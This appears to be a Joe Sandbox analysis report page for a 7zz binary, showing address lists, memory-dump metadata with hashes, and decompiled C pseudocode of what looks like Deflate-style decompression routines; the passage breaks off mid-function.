0x00000000
0x00454ff2
0x00454fc1
0x00454fc6
0x00000000
0x00000000
0x00454fc8
0x00454fc8
0x00454fca
0x00454fcf
0x00454fd3
0x00000000
0x00454fd3
0x00454e51
0x00454db5
0x00454dbd
0x00454dc2
0x00454dc6
0x00454dce
0x00454dd0
0x00454dd5
0x00454dd5
0x00454ddc
0x00454de7
0x00454dec
0x00454df0
0x00454dfb
0x00454dfd
0x00454e02
0x00454e02
0x00454e05
0x00454e05
0x00000000
0x00454e05
0x00454d49
0x00454d51
0x00454d56
0x00454d5a
0x00454d62
0x00454d64
0x00454d69
0x00454d69
0x00454d70
0x00454d7b
0x00454d80
0x00454d84
0x00454d8f
0x00454d91
0x00000000
0x00454d93
0x00454d96
0x00454d99
0x00000000
0x00454d99
0x00454d91
0x00454cd9
0x00454ce1
0x00454ce6
0x00454cea
0x00454cf2
0x00454cf4
0x00454cf9
0x00454cf9
0x00454d00
0x00454d0b
0x00454d10
0x00454d14
0x00454d1f
0x00454d21
0x00000000
0x00454d27
0x00454d2a
0x00454d2d
0x00000000
0x00454d2d
0x00454d21
0x00454cac
0x00454caf
0x00000000
0x00000000
0x00454cb1
0x00454cb4
0x00000000
0x00000000
0x00454cb6
0x00454cb9
0x00000000
0x00000000
0x00000000
0x00454bfb
0x00454bff
0x00454c07
0x00454c0c
0x00454c10
0x00454c18
0x00454c1a
0x00454c1f
0x00454c1f
0x00454c26
0x00454c31
0x00454c36
0x00454c3a
0x00454c45
0x00454c47
0x00454c4c
0x00454c4c
0x00000000
0x00454c47
0x00454b6d
0x00454b71
0x00454b79
0x00454b7e
0x00454b82
0x00454b8c
0x00454b91
0x00454b91
0x00454b98
0x00454ba3
0x00454ba8
0x00454bac
0x00454bb9
0x00454c4f
0x00454c4f
0x00000000
0x00454bbf
0x00454bc2
0x00454bc5
0x004551f5
0x00455200
0x0045520d
0x0045520d
0x00454bb9

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c3b520574d05f56df56403af9e8bc413c423cf886d632776319decb9a179020
Instruction ID: 6ebc25fde0dfe73e998ef2a13e85b2c570cd5fc6f02970fa413b5811a577ba22
Opcode Fuzzy Hash: 9c3b520574d05f56df56403af9e8bc413c423cf886d632776319decb9a179020
Instruction Fuzzy Hash: FE126C306083818FD724CF29C454BAFBBE1AFD5308F14891EE8D987392DA789849CB57

Uniqueness

Uniqueness Score: -1.00%

Function 0044A7E0 Relevance: .5, Instructions: 453
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0044A7E0(void* __ecx) {
				void* __edi;
				intOrPtr _t172;
				signed int _t174;
				unsigned int _t182;
				signed int _t185;
				signed char _t186;
				void* _t187;
				signed int _t193;
				signed int _t198;
				signed int _t201;
				signed int _t208;
				signed int _t209;
				signed int _t211;
				intOrPtr _t216;
				signed int _t218;
				signed int _t220;
				intOrPtr _t225;
				signed int _t227;
				signed int _t230;
				signed char _t232;
				signed char _t236;
				signed int _t240;
				signed int _t244;
				signed int _t249;
				intOrPtr _t258;
				intOrPtr _t263;
				signed int _t267;
				signed int _t268;
				signed int _t274;
				intOrPtr* _t280;
				intOrPtr _t285;
				signed int _t288;
				void* _t289;
				intOrPtr* _t292;
				signed int _t305;
				void* _t310;
				signed int _t321;
				void* _t342;
				intOrPtr* _t345;
				signed int _t351;
				signed int _t356;
				unsigned int _t357;
				signed int _t359;
				signed int _t362;
				intOrPtr _t367;
				intOrPtr _t370;
				intOrPtr _t375;
				void* _t378;
				unsigned int _t379;
				intOrPtr* _t380;
				intOrPtr _t383;
				signed int _t385;
				intOrPtr* _t386;
				intOrPtr _t388;
				intOrPtr _t391;
				intOrPtr _t394;
				signed int _t395;
				signed int _t396;
				intOrPtr _t401;
				void* _t402;

				_t378 = __ecx;
				_t172 =  *((intOrPtr*)(__ecx + 0xd54));
				if(_t172 == 0xffffffff) {
					L82:
					__eflags = 0;
					return 0;
				} else {
					_t379 = 0;
					if(_t172 != 0xfffffffe) {
						L9:
						_t395 =  *(_t402 + 0x28);
						__eflags = _t395 - _t379;
						if(_t395 == _t379) {
							goto L82;
						} else {
							_t174 =  *(_t378 + 0xd54);
							__eflags = _t174 - _t379;
							if(_t174 <= _t379) {
								L18:
								__eflags = _t395 - _t379;
								if(_t395 <= _t379) {
									goto L82;
								} else {
									while(1) {
										__eflags =  *(_t378 + 0xd5c);
										if( *(_t378 + 0xd5c) == 0) {
											goto L23;
										}
										__eflags =  *(_t378 + 0xd48);
										if(__eflags != 0) {
											 *(_t378 + 0xd54) = 0xffffffff;
											__eflags = 0;
											return 0;
										} else {
											_t240 = E0044A440(_t378, __eflags);
											__eflags = _t240;
											if(_t240 == 0) {
												L80:
												return 1;
											} else {
												 *(_t378 + 0xd5c) = 0;
												goto L23;
											}
										}
										goto L83;
										L23:
										__eflags =  *(_t378 + 0xd49);
										if( *(_t378 + 0xd49) == 0) {
											while(1) {
												__eflags =  *(_t378 + 0x68) - 4;
												if( *(_t378 + 0x68) > 4) {
													goto L80;
												}
												_t380 = _t378 + 0x40;
												E0041F43D(_t380);
												_t258 =  *_t380;
												_t182 =  *(_t380 + 4) >> 0x00000008 - _t258 >> 0x00000009 & 0x00007fff;
												__eflags = _t182 -  *((intOrPtr*)(_t378 + 0x9c));
												if(_t182 >=  *((intOrPtr*)(_t378 + 0x9c))) {
													__eflags = _t182 -  *((intOrPtr*)(_t378 + 0xa0));
													_t280 = _t378 + 0xa0;
													_t351 = 0xa;
													if(_t182 >=  *((intOrPtr*)(_t378 + 0xa0))) {
														do {
															_t280 = _t280 + 4;
															_t351 = _t351 + 1;
															__eflags = _t182 -  *_t280;
														} while (_t182 >=  *_t280);
													}
												} else {
													_t351 =  *((intOrPtr*)((_t182 >> 6) + _t378 + 0x578));
												}
												 *_t380 = _t258 + _t351;
												 *(_t380 + 0x30) =  *(_t380 + 0x30) >> _t351;
												_t185 = (_t182 -  *((intOrPtr*)(_t378 + 0x74 + _t351 * 4)) >> 0xf - _t351) +  *((intOrPtr*)(_t378 + 0xb8 + _t351 * 4));
												__eflags = _t185 - 0x120;
												if(_t185 >= 0x120) {
													goto L80;
												} else {
													_t186 =  *(_t378 + 0xf8 + _t185 * 4);
													__eflags = _t186 - 0x100;
													if(__eflags >= 0) {
														if(__eflags == 0) {
															 *(_t378 + 0xd5c) = 1;
															goto L77;
														} else {
															__eflags = _t186 - 0x11e;
															if(_t186 >= 0x11e) {
																goto L80;
															} else {
																_t187 = _t186 - 0x101;
																__eflags =  *(_t378 + 0xd51);
																if( *(_t378 + 0xd51) == 0) {
																	__eflags = 0;
																	_t356 =  *((intOrPtr*)(_t187 + 0x47bfc0));
																	 *(_t402 + 0x10) = 0;
																} else {
																	_t356 =  *((intOrPtr*)(_t187 + 0x47bfe0));
																	 *(_t402 + 0x10) = 0;
																}
																_t396 = _t356;
																__eflags =  *_t380 - 8;
																if( *_t380 >= 8) {
																	do {
																		 *(_t402 + 0x18) = 0;
																		_t220 = E0044AD80(_t380 + 8, _t402 + 0x14);
																		__eflags = _t220;
																		if(_t220 == 0) {
																			 *(_t402 + 0x14) = 0xff;
																			_t227 =  *(_t380 + 0x28) + 1;
																			__eflags = _t227;
																			 *(_t380 + 0x28) = _t227;
																		}
																		_t370 =  *_t380;
																		 *(_t380 + 0x30) =  *(_t380 + 0x30) | ( *(_t402 + 0x14) & 0x000000ff) << 0x00000020 - _t370;
																		_t225 = _t370 - 8;
																		__eflags = _t225 - 8;
																		 *(_t380 + 4) =  *(_t380 + 4) << 8;
																		 *_t380 = _t225;
																	} while (_t225 >= 8);
																}
																_t357 =  *(_t380 + 0x30);
																 *_t380 =  *_t380 + _t396;
																_t112 = ((0x00000001 << _t396) - 0x00000001 & _t357) + 3; // 0x40003
																_t193 =  *(_t402 + 0x10) + _t112;
																_t305 =  *(_t402 + 0x28);
																__eflags = _t193 - _t305;
																 *(_t380 + 0x30) = _t357 >> _t396;
																 *(_t402 + 0x10) = _t193;
																 *(_t402 + 0x1c) = _t193;
																if(_t193 > _t305) {
																	 *(_t402 + 0x1c) = _t305;
																}
																E0041F43D(_t380);
																_t263 =  *_t380;
																_t198 =  *(_t380 + 4) >> 0x00000008 - _t263 >> 0x00000009 & 0x00007fff;
																__eflags = _t198 -  *((intOrPtr*)(_t378 + 0x79c));
																if(_t198 >=  *((intOrPtr*)(_t378 + 0x79c))) {
																	_t310 = _t378 + 0x7a0;
																	__eflags = _t198 -  *((intOrPtr*)(_t378 + 0x7a0));
																	_t359 = 0xa;
																	if(_t198 >=  *((intOrPtr*)(_t378 + 0x7a0))) {
																		do {
																			_t401 =  *((intOrPtr*)(_t310 + 4));
																			_t310 = _t310 + 4;
																			_t359 = _t359 + 1;
																			__eflags = _t198 - _t401;
																		} while (_t198 >= _t401);
																	}
																} else {
																	_t359 = 0;
																}
																 *_t380 = _t263 + _t359;
																 *(_t380 + 0x30) =  *(_t380 + 0x30) >> _t359;
																_t267 =  *(_t378 + 0x7b8 + _t359 * 4);
																_t201 = (_t198 -  *((intOrPtr*)(_t378 + 0x774 + _t359 * 4)) >> 0xf - _t359) + _t267;
																__eflags = _t201 - 0x20;
																if(_t201 < 0x20) {
																	_t268 =  *(_t378 + 0x7f8 + _t201 * 4);
																} else {
																	_t268 = _t267 | 0xffffffff;
																}
																 *(_t402 + 0x20) = _t268;
																__eflags = _t268 -  *((intOrPtr*)(_t378 + 0xd4c));
																if(_t268 >=  *((intOrPtr*)(_t378 + 0xd4c))) {
																	goto L80;
																} else {
																	__eflags =  *_t380 - 8;
																	if( *_t380 >= 8) {
																		do {
																			 *(_t402 + 0x1c) = 0;
																			_t211 = E0044AD80(_t380 + 8, _t402 + 0x18);
																			__eflags = _t211;
																			if(_t211 == 0) {
																				 *(_t402 + 0x18) = 0xff;
																				_t218 =  *(_t380 + 0x28) + 1;
																				__eflags = _t218;
																				 *(_t380 + 0x28) = _t218;
																			}
																			_t367 =  *_t380;
																			 *(_t380 + 0x30) =  *(_t380 + 0x30) | ( *(_t402 + 0x18) & 0x000000ff) << 0x00000020 - _t367;
																			_t216 = _t367 - 8;
																			__eflags = _t216 - 8;
																			 *(_t380 + 4) =  *(_t380 + 4) << 8;
																			 *_t380 = _t216;
																		} while (_t216 >= 8);
																		_t268 =  *(_t402 + 0x20);
																	}
																	_t362 =  *(_t380 + 0x30);
																	 *_t380 =  *_t380;
																	_push( *(_t402 + 0x1c));
																	 *(_t380 + 0x30) = _t362 >> 0;
																	_t388 =  *((intOrPtr*)(0x47c000 + _t268 * 4)) + (0xbadbac & _t362);
																	_push(_t388);
																	_t208 = E0044ADB0(_t378 + 0x18);
																	__eflags = _t208;
																	if(_t208 == 0) {
																		goto L80;
																	} else {
																		_t209 =  *(_t402 + 0x1c);
																		_t321 =  *(_t402 + 0x10) - _t209;
																		__eflags = _t321;
																		 *(_t402 + 0x28) =  *(_t402 + 0x28) - _t209;
																		 *(_t402 + 0x10) = _t321;
																		if(_t321 != 0) {
																			_t395 =  *(_t402 + 0x28);
																			 *(_t378 + 0xd54) =  *(_t402 + 0x10);
																			 *((intOrPtr*)(_t378 + 0xd58)) = _t388;
																			goto L77;
																		} else {
																			goto L73;
																		}
																	}
																}
															}
														}
													} else {
														_t342 = _t378 + 0x18;
														 *( *((intOrPtr*)(_t378 + 0x18)) +  *((intOrPtr*)(_t378 + 0x1c))) = _t186;
														_t391 =  *((intOrPtr*)(_t342 + 4)) + 1;
														 *((intOrPtr*)(_t342 + 4)) = _t391;
														__eflags = _t391 -  *((intOrPtr*)(_t342 + 8));
														if(__eflags == 0) {
															E0040EFBD(_t342, __eflags);
														}
														 *(_t402 + 0x28) = _t395 - 1;
														L73:
														_t395 =  *(_t402 + 0x28);
														__eflags = _t395;
														if(_t395 <= 0) {
															goto L82;
														} else {
															continue;
														}
													}
												}
												goto L83;
											}
											goto L80;
										} else {
											_t230 =  *(_t378 + 0xd44);
											__eflags = _t230;
											if(__eflags > 0) {
												while(1) {
													__eflags = _t395;
													if(_t395 <= 0) {
														break;
													}
													_t285 =  *((intOrPtr*)(_t378 + 0x40));
													__eflags = _t285 - 0x20;
													if(_t285 != 0x20) {
														_t232 =  *(_t378 + 0x70);
														 *((intOrPtr*)(_t378 + 0x40)) = _t285 + 8;
														_t288 =  *(_t378 + 0x70) >> 8;
														__eflags = _t288;
														 *(_t378 + 0x70) = _t288;
													} else {
														_t386 = _t378 + 0x48;
														__eflags =  *((intOrPtr*)(_t378 + 0x48)) -  *((intOrPtr*)(_t378 + 0x4c));
														if( *((intOrPtr*)(_t378 + 0x48)) <  *((intOrPtr*)(_t378 + 0x4c))) {
															L29:
															_t292 =  *_t386;
															_t232 =  *_t292;
															 *_t386 = _t292 + 1;
														} else {
															_t236 = E0040E007(_t386, _t378);
															__eflags = _t236;
															if(_t236 == 0) {
																_t232 = _t236 | 0x000000ff;
																 *(_t378 + 0x68) =  *(_t378 + 0x68) + 1;
															} else {
																goto L29;
															}
														}
													}
													_t289 = _t378 + 0x18;
													 *( *((intOrPtr*)(_t378 + 0x18)) +  *((intOrPtr*)(_t378 + 0x1c))) = _t232;
													_t383 =  *((intOrPtr*)(_t289 + 4)) + 1;
													 *((intOrPtr*)(_t289 + 4)) = _t383;
													__eflags = _t383 -  *((intOrPtr*)(_t289 + 8));
													if(__eflags == 0) {
														E0040EFBD(_t289, __eflags);
													}
													_t385 =  *(_t378 + 0xd44) - 1;
													_t395 = _t395 - 1;
													 *(_t378 + 0xd44) = _t385;
													__eflags = _t385;
													if(_t385 > 0) {
														continue;
													}
													break;
												}
												_t230 =  *(_t378 + 0xd44);
												 *(_t402 + 0x28) = _t395;
												__eflags = _t230;
											}
											 *(_t378 + 0xd5c) = _t230 & 0xffffff00 | __eflags == 0x00000000;
											L77:
											__eflags = _t395;
											if(_t395 <= 0) {
												goto L82;
											} else {
												continue;
											}
										}
										goto L83;
									}
								}
							} else {
								while(1) {
									__eflags = _t395 - _t379;
									if(_t395 <= _t379) {
										break;
									}
									_t345 = _t378 + 0x18;
									 *(_t378 + 0xd54) = _t174 - 1;
									_t375 =  *((intOrPtr*)(_t345 + 0x10));
									_t244 =  *((intOrPtr*)(_t345 + 4)) -  *((intOrPtr*)(_t378 + 0xd58)) - 1;
									__eflags = _t244 - _t375;
									if(_t244 >= _t375) {
										_t244 = _t244 + _t375;
										__eflags = _t244;
									}
									 *((char*)( *_t345 +  *((intOrPtr*)(_t345 + 4)))) =  *((intOrPtr*)( *_t345 + _t244));
									_t394 =  *((intOrPtr*)(_t345 + 4)) + 1;
									 *((intOrPtr*)(_t345 + 4)) = _t394;
									__eflags = _t394 -  *((intOrPtr*)(_t345 + 8));
									if(__eflags == 0) {
										E0040EFBD(_t345, __eflags);
									}
									_t174 =  *(_t378 + 0xd54);
									_t379 = 0;
									_t395 = _t395 - 1;
									__eflags = _t174;
									if(_t174 > 0) {
										continue;
									} else {
										 *(_t402 + 0x28) = _t395;
										goto L18;
									}
									goto L83;
								}
								 *(_t402 + 0x28) = _t395;
								goto L82;
							}
						}
					} else {
						if( *((intOrPtr*)(__ecx + 0xd52)) != 0) {
							L5:
							_t274 =  *((intOrPtr*)(_t378 + 0xd53));
							_t249 = E0040DF95(_t378 + 0x48, 0x20000);
							__eflags = _t249;
							if(_t249 == 0) {
								goto L4;
							} else {
								__eflags = _t274;
								if(_t274 != 0) {
									E0040DFF3(_t378 + 0x48);
									 *((intOrPtr*)(_t378 + 0x40)) = 0x20;
									 *(_t378 + 0x44) = _t379;
									 *(_t378 + 0x68) = _t379;
									 *(_t378 + 0x70) = _t379;
									 *((char*)(_t378 + 0xd53)) = 0;
								}
								E00450690( *((intOrPtr*)(_t378 + 0xd52)));
								 *(_t378 + 0xd48) = 0;
								 *(_t378 + 0xd54) = _t379;
								 *(_t378 + 0xd5c) = 1;
								goto L9;
							}
						} else {
							asm("sbb eax, eax");
							if(E0040EE76(__ecx + 0x18, ( ~( *(__ecx + 0xd51)) & 0x00008000) + 0x8000) != 0) {
								goto L5;
							} else {
								L4:
								return 0x8007000e;
							}
						}
					}
				}
				L83:
			}

0x0044a7e7
0x0044a7e9
0x0044a7f2
0x0044ad6d
0x0044ad6d
0x0044ad73
0x0044a7f8
0x0044a7f8
0x0044a7fd
0x0044a89a
0x0044a89a
0x0044a89e
0x0044a8a0
0x00000000
0x0044a8a6
0x0044a8a6
0x0044a8ac
0x0044a8ae
0x0044a90a
0x0044a90a
0x0044a90c
0x00000000
0x00000000
0x0044a912
0x0044a918
0x0044a91a
0x00000000
0x00000000
0x0044a922
0x0044a924
0x0044ad41
0x0044ad4e
0x0044ad54
0x0044a92a
0x0044a92c
0x0044a931
0x0044a933
0x0044ad5a
0x0044ad63
0x0044a939
0x0044a939
0x00000000
0x0044a939
0x0044a933
0x00000000
0x0044a940
0x0044a946
0x0044a948
0x0044a9f5
0x0044a9f5
0x0044a9f9
0x00000000
0x00000000
0x0044a9ff
0x0044aa04
0x0044aa09
0x0044aa20
0x0044aa25
0x0044aa27
0x0044aa39
0x0044aa3f
0x0044aa45
0x0044aa4a
0x0044aa4c
0x0044aa4c
0x0044aa4f
0x0044aa50
0x0044aa50
0x0044aa4c
0x0044aa29
0x0044aa30
0x0044aa30
0x0044aa58
0x0044aa5f
0x0044aa78
0x0044aa7a
0x0044aa7f
0x00000000
0x0044aa85
0x0044aa85
0x0044aa8c
0x0044aa91
0x0044aabe
0x0044ad1b
0x00000000
0x0044aac4
0x0044aac4
0x0044aac9
0x00000000
0x0044aacf
0x0044aad5
0x0044aada
0x0044aadc
0x0044aaf6
0x0044aafe
0x0044ab04
0x0044aade
0x0044aae8
0x0044aaee
0x0044aaee
0x0044ab0a
0x0044ab0c
0x0044ab0f
0x0044ab11
0x0044ab19
0x0044ab1e
0x0044ab23
0x0044ab25
0x0044ab2a
0x0044ab2f
0x0044ab2f
0x0044ab30
0x0044ab30
0x0044ab37
0x0044ab4e
0x0044ab61
0x0044ab64
0x0044ab67
0x0044ab6a
0x0044ab6a
0x0044ab11
0x0044ab6e
0x0044ab7e
0x0044ab8b
0x0044ab8b
0x0044ab8f
0x0044ab93
0x0044ab95
0x0044ab98
0x0044ab9c
0x0044aba0
0x0044aba2
0x0044aba2
0x0044aba8
0x0044abad
0x0044abc4
0x0044abc9
0x0044abcb
0x0044abe5
0x0044abeb
0x0044abed
0x0044abf2
0x0044abf4
0x0044abf4
0x0044abf7
0x0044abfa
0x0044abfb
0x0044abfb
0x0044abf4
0x0044abcd
0x0044abdb
0x0044abdb
0x0044ac03
0x0044ac11
0x0044ac1b
0x0044ac26
0x0044ac28
0x0044ac2b
0x0044ac32
0x0044ac2d
0x0044ac2d
0x0044ac2d
0x0044ac3f
0x0044ac43
0x0044ac45
0x00000000
0x0044ac4b
0x0044ac55
0x0044ac5a
0x0044ac5c
0x0044ac64
0x0044ac69
0x0044ac6e
0x0044ac70
0x0044ac75
0x0044ac7a
0x0044ac7a
0x0044ac7b
0x0044ac7b
0x0044ac82
0x0044ac99
0x0044acac
0x0044acaf
0x0044acb2
0x0044acb5
0x0044acb5
0x0044acb9
0x0044acb9
0x0044acbd
0x0044accd
0x0044acda
0x0044acde
0x0044ace8
0x0044acea
0x0044aceb
0x0044acf0
0x0044acf2
0x00000000
0x0044acf4
0x0044acf4
0x0044ad02
0x0044ad02
0x0044ad04
0x0044ad08
0x0044ad0c
0x0044ad28
0x0044ad2c
0x0044ad32
0x00000000
0x00000000
0x00000000
0x00000000
0x0044ad0c
0x0044acf2
0x0044ac45
0x0044aac9
0x0044aa93
0x0044aa99
0x0044aa9c
0x0044aaa5
0x0044aaa8
0x0044aaab
0x0044aaad
0x0044aaaf
0x0044aaaf
0x0044aab5
0x0044ad0e
0x0044ad0e
0x0044ad12
0x0044ad14
0x00000000
0x0044ad16
0x00000000
0x0044ad16
0x0044ad14
0x0044aa91
0x00000000
0x0044aa7f
0x00000000
0x0044a94e
0x0044a94e
0x0044a954
0x0044a956
0x0044a95c
0x0044a95c
0x0044a95e
0x00000000
0x00000000
0x0044a960
0x0044a963
0x0044a966
0x0044a994
0x0044a99a
0x0044a9a0
0x0044a9a0
0x0044a9a3
0x0044a968
0x0044a96e
0x0044a971
0x0044a973
0x0044a980
0x0044a980
0x0044a982
0x0044a985
0x0044a975
0x0044a977
0x0044a97c
0x0044a97e
0x0044a98c
0x0044a98f
0x00000000
0x00000000
0x00000000
0x0044a97e
0x0044a973
0x0044a9ac
0x0044a9af
0x0044a9b8
0x0044a9bb
0x0044a9be
0x0044a9c0
0x0044a9c2
0x0044a9c2
0x0044a9cd
0x0044a9ce
0x0044a9d1
0x0044a9d7
0x0044a9d9
0x00000000
0x00000000
0x00000000
0x0044a9d9
0x0044a9db
0x0044a9e1
0x0044a9e5
0x0044a9e5
0x0044a9ea
0x0044ad38
0x0044ad38
0x0044ad3a
0x00000000
0x0044ad3c
0x00000000
0x0044ad3c
0x0044ad3a
0x00000000
0x0044a948
0x0044a912
0x0044a8b0
0x0044a8b0
0x0044a8b0
0x0044a8b2
0x00000000
0x00000000
0x0044a8bf
0x0044a8c2
0x0044a8cd
0x0044a8d0
0x0044a8d1
0x0044a8d3
0x0044a8d5
0x0044a8d5
0x0044a8d5
0x0044a8e1
0x0044a8ea
0x0044a8ed
0x0044a8f0
0x0044a8f2
0x0044a8f4
0x0044a8f4
0x0044a8f9
0x0044a8ff
0x0044a901
0x0044a902
0x0044a904
0x00000000
0x0044a906
0x0044a906
0x00000000
0x0044a906
0x00000000
0x0044a904
0x0044ad66
0x00000000
0x0044ad66
0x0044a8ae
0x0044a803
0x0044a80b
0x0044a83d
0x0044a83d
0x0044a84b
0x0044a850
0x0044a852
0x00000000
0x0044a854
0x0044a854
0x0044a856
0x0044a85b
0x0044a860
0x0044a867
0x0044a86a
0x0044a86d
0x0044a870
0x0044a870
0x0044a881
0x0044a886
0x0044a88d
0x0044a893
0x00000000
0x0044a893
0x0044a80d
0x0044a818
0x0044a82c
0x00000000
0x0044a831
0x0044a831
0x0044a83a
0x0044a83a
0x0044a82c
0x0044a80b
0x0044a7fd
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb4acdf8bf1421510833bd6b1ce7ab3a7039bd55d3ca3d2172d8faff35e7650
Instruction ID: 184203cb68d9c273adb077903bfb3a348430252a785c529ac687c963470ba2b4
Opcode Fuzzy Hash: beb4acdf8bf1421510833bd6b1ce7ab3a7039bd55d3ca3d2172d8faff35e7650
Instruction Fuzzy Hash: E902E371604A428BD718CF28C49066AFBE2FF95304F14462ED49A87741D739F8A6CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 0044E430 Relevance: .4, Instructions: 418
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0044E430(signed int __ecx, void* __eflags) {
				intOrPtr _t140;
				signed int _t141;
				signed int _t142;
				signed int _t148;
				signed int _t150;
				signed int _t151;
				signed int _t153;
				signed int _t156;
				unsigned int _t159;
				signed int _t160;
				signed int _t175;
				intOrPtr _t180;
				signed int _t182;
				signed int _t183;
				unsigned int _t185;
				signed int _t187;
				void* _t191;
				signed int _t193;
				signed int _t198;
				signed int _t200;
				intOrPtr _t202;
				char* _t203;
				signed int _t207;
				signed int _t209;
				intOrPtr _t214;
				signed int _t216;
				signed int _t221;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t252;
				signed int _t285;
				signed int _t289;
				signed int _t292;
				intOrPtr _t295;
				intOrPtr _t309;
				signed int _t313;
				intOrPtr _t315;
				signed int _t316;
				intOrPtr _t321;
				signed int _t324;
				intOrPtr _t326;
				intOrPtr* _t329;
				intOrPtr* _t333;
				signed int _t337;
				signed int _t342;
				signed int _t349;
				intOrPtr* _t350;
				intOrPtr _t355;
				void* _t356;

				_push(0xffffffff);
				_push(E00479808);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t355;
				_t356 = _t355 - 0x24;
				_t337 = __ecx;
				_t332 = __ecx + 0x40;
				 *(_t356 + 0x14) = __ecx;
				if(E0040DF95(__ecx + 0x40, 0x100000) != 0) {
					_t140 =  *0x4914f0; // 0x2000
					_t329 = __ecx + 0x10;
					_t141 = E0040EE76(_t329, _t140);
					__eflags = _t141;
					if(_t141 != 0) {
						_t142 =  *(_t356 + 0x50);
						__eflags = _t142;
						if(_t142 != 0) {
							 *((intOrPtr*)(_t356 + 0x24)) =  *_t142;
							 *((intOrPtr*)(_t356 + 0x20)) = 0;
							 *((intOrPtr*)(_t356 + 0x24)) = 0;
							 *((intOrPtr*)(_t356 + 0x2c)) =  *((intOrPtr*)(_t142 + 4));
							E0040EEC1(_t329,  *(_t356 + 0x48));
							E00450690(0);
							E0040DFE4(_t332,  *(_t356 + 0x44));
							_t333 = __ecx + 0x38;
							E0040DFF3(_t333 + 8);
							 *_t333 = 0x20;
							 *(_t333 + 4) = 0;
							 *(_t333 + 0x28) = 0;
							 *(_t333 + 0x30) = 0;
							 *((intOrPtr*)(_t356 + 0x18)) = __ecx;
							 *((intOrPtr*)(_t356 + 0x3c)) = 0;
							_t148 = E0044E3B0(__ecx);
							__eflags = _t148;
							if(_t148 != 0) {
								_t309 =  *((intOrPtr*)(_t356 + 0x20));
								__eflags = _t309 -  *((intOrPtr*)(_t356 + 0x28));
								_t150 =  *(_t356 + 0x1c);
								if(__eflags > 0) {
									L64:
									__eflags =  *((intOrPtr*)(_t356 + 0x20)) -  *((intOrPtr*)(_t356 + 0x28));
									if(__eflags < 0) {
										L70:
										_t151 = E0040EFA1(_t329);
										 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
										E0044E120(_t337);
										_t153 = _t151;
									} else {
										if(__eflags > 0) {
											goto L67;
										} else {
											__eflags = _t150 -  *((intOrPtr*)(_t356 + 0x24));
											if(_t150 <=  *((intOrPtr*)(_t356 + 0x24))) {
												goto L70;
											} else {
												goto L67;
											}
										}
									}
								} else {
									if(__eflags < 0) {
										L11:
										_t221 =  *(_t356 + 0x54);
										__eflags = _t221;
										if(_t221 == 0) {
											L15:
											E0041F43D(_t333);
											_t156 =  *(_t333 + 0x30);
											__eflags = _t156 & 0x00000001;
											 *_t333 =  *_t333 + 1;
											 *(_t333 + 0x30) = _t156 >> 1;
											if((_t156 & 0x00000001) != 0) {
												__eflags =  *(_t337 + 0x239);
												if( *(_t337 + 0x239) == 0) {
													__eflags =  *_t333 - 8;
													if( *_t333 >= 8) {
														do {
															 *((char*)(_t356 + 0x18)) = 0;
															_t175 = E0044AD80(_t333 + 8, _t356 + 0x14);
															__eflags = _t175;
															if(_t175 == 0) {
																 *(_t356 + 0x14) = 0xff;
																_t182 =  *(_t333 + 0x28) + 1;
																__eflags = _t182;
																 *(_t333 + 0x28) = _t182;
															}
															_t315 =  *_t333;
															 *(_t333 + 0x30) =  *(_t333 + 0x30) | ( *(_t356 + 0x14) & 0x000000ff) << 0x00000020 - _t315;
															_t180 = _t315 - 8;
															__eflags = _t180 - 8;
															 *(_t333 + 4) =  *(_t333 + 4) << 8;
															 *_t333 = _t180;
														} while (_t180 >= 8);
													}
													_t159 =  *(_t333 + 0x30);
													_t252 = _t159 & 0x000000ff;
													 *_t333 =  *_t333 + 8;
													_t160 = _t159 >> 8;
													__eflags = _t160;
													 *(_t333 + 0x30) = _t160;
													goto L58;
												} else {
													_push(_t333);
													_t183 = E0044EBB0(_t337 + 0x70);
													__eflags = _t183 - 0x100;
													if(_t183 >= 0x100) {
														L67:
														 *((intOrPtr*)(_t356 + 0x3c)) = 0xffffffff;
														E0044E120(_t337);
														_t153 = 1;
													} else {
														_t252 = _t183;
														L58:
														 *( *(_t329 + 4) +  *_t329) = _t252;
														_t313 =  *(_t329 + 4) + 1;
														 *(_t329 + 4) = _t313;
